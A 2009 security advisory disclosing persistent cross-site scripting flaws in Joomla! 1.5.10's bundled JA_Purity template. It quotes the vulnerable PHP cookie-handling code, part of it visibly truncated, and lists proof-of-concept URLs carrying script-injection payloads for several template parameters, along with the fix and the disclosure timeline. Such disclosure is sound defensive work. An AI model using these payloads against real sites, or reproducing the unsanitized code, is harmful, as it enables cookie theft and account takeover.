`============================================= INTERNET SECURITY AUDITORS ALERT 2009-006 - Original release date: April 5th, 2009 - Last revised: June 5th, 2009 - Discovered by: Juan Galiana Lara - Severity: 6.4/10 (CVSS Base Score) ============================================= I. VULNERABILITY ------------------------- Joomla! 1.5.10 JA_Purity Multiple Persistent XSS II. BACKGROUND ------------------------- Joomla! is an award-winning content management system (CMS), which enables you to build Web sites and powerful online applications. Many aspects, including its ease-of-use and extensibility, have made Joomla! the most popular Web site software available. Best of all, Joomla! is an open source solution that is freely available to everyone. Joomla! comes with 3 default templates, JA_Purity is one of them. III. DESCRIPTION ------------------------- JA_Purity template is bundled in Joomla! and fails to sanitized user supplied input. An attacker can inject JavaScript or DHTML that will be saved in the cookie making persistent, running in the context of targeted user browser, allowing him to steal cookies. In file 'template/ja_purity/ja_templatetools.php', the getUserSetting() reads $_GET array and makes the data persistent setting it in a cookie: 4 define ('JA_TOOL_FONT', 'ja_font'); ... 27 function getUserSetting(){ 28 $exp = time() + 60*60*24*355; 29 if (isset($_COOKIE[$this->template.'_tpl']) && $_COOKIE[$this->template.'_tpl'] == $this->template){ 30 foreach($this->_params_cookie as $k=>$v) { 31 $kc = $this->template."_".$k; 32 if (isset($_GET[$k])){ 33 $v = $_GET[$k]; 34 setcookie ($kc, $v, $exp, '/'); 35 }else{ 36 if (isset($_COOKIE[$kc])){ 37 $v = $_COOKIE[$kc]; 38 } 39 } 40 $this->setParam($k, $v); 41 } 42 43 }else{ 44 setcookie ($this->template.'_tpl', $this->template, $exp, '/'); 45 } 46 return $this; 47 } 48 49 function getParam ($param, $default='') { 50 if (isset($this->_params_cookie[$param])) { 51 return $this->_params_cookie[$param]; 52 } 53 return $this->_tpl->params->get($param, $default); 54 } 55 56 function setParam ($param, $value) { 57 $this->_params_cookie[$param] = $value; 58 } File 'template/ja_purity/index.php' reads data with getParam and write it directly: 57 getParam('theme_header') && $tmpTools->getParam('theme_header')!='-1') : ?> 58 59 60 getParam('theme_background') && $tmpTools->getParam('theme_background')!='-1') : ?> 61 62 63 getParam('theme_elements') && $tmpTools->getParam('theme_elements')!='-1') : ?> 64 65 99: 118 if ($tmpTools->getParam('logoType')=='image'): ?> 119

120 121

122 getParam('logoText'))=='') ? $config->sitename : $tmpTools->getParam('logoText'); 124 $sloganText = (trim($tmpTools->getParam('sloganText'))=='') ? JText::_('SITE SLOGAN') : $tmpTools->getParam('sloganText'); ?> 125

126 127

128

129 These are all the variables of JA_Purity template, most of them are vulnerable: logoType logoText sloganText ja_font ja_screen ja_screen_width theme_header theme_background theme_elements horNav horNavType rightCollapsible rightCollapseDefault excludeModules showComponent IV. PROOF OF CONCEPT ------------------------- http://site/path/?theme_header=%22%3E%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E http://site/path/?theme_background=%22%3E%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E http://site/path/?theme_elements=%22%3E%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E http://site/path/?logoType=1&logoText=%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E http://site/path/?logoType=1&sloganText=%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E http://site/path/?excludeModules=%27;alert(8);%20var%20b=%27 http://site/path/?rightCollapseDefault=%27;alert(8);%20var%20b=%27 http://site/path/?ja_font=%22%3E%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E V. BUSINESS IMPACT ------------------------- An attacker can exploit the vulnerability to store persistent XSS. This may lead in steal the targeted user cookies and gain access to the user account. VI. SYSTEMS AFFECTED ------------------------- Joomla! <= 1.5.10 is vulnerable which comes with JA_Purity template 1.2.0 VII. SOLUTION ------------------------- Upgrade to version 1.5.11. All inputs should be sanitized at setParam/getParam function, in the same way is done in libraries/joomla/environment/request.php:140 with $var = JRequest::_cleanVar($input[$name], $mask, $type); VIII. REFERENCES ------------------------- http://www.joomla.org http://www.joomlart.org http://www.isecauditors.com IX. CREDITS ------------------------- This vulnerability has been discovered by Juan Galiana Lara (jgaliana (at) isecauditors (dot) com). X. REVISION HISTORY ------------------------- April 5, 2009: Initial release. June 5, 2009: Last revision. XI. DISCLOSURE TIMELINE ------------------------- April 5, 2009: Discovered by Internet Security Auditors. April 6, 2009: Vendor contacted. They will study the advisory. May-June, 2009: No responses to queries about patching schedule. June 3, 2009: Security Release 1.5.11 published. XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information. `

Query Builder